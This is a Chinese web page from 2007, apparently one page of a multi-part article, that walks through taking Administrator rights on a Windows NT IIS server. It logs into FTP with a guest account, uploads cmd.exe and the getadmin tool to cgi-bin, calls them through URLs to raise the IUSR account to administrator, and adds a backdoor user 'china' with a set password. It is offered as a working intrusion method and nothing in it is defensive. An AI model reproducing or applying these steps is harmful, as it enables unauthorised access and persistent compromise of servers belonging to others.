WEB开发网
开发学院操作系统windows 2008 操作Windows NT的Administrator权限 阅读

操作Windows NT的Administrator权限

 2007-05-07 12:22:43 来源:WEB开发网   
核心提示: ftp www.xxx.comConnected to www.xxx.com220 ntsvr2 Microsoft FTP Service (Version 3.0).Ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,操作Windows NT的Administrato
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。

User (www.xxx.com:(none)):anonymous

Password:输入 guest@ 或者guest。

对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组。在这种情况下我们就可以进NT server的ftp了。

进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32
et.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录。

上一页  1 2 3 4  下一页

Tags:操作 Windows NT

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接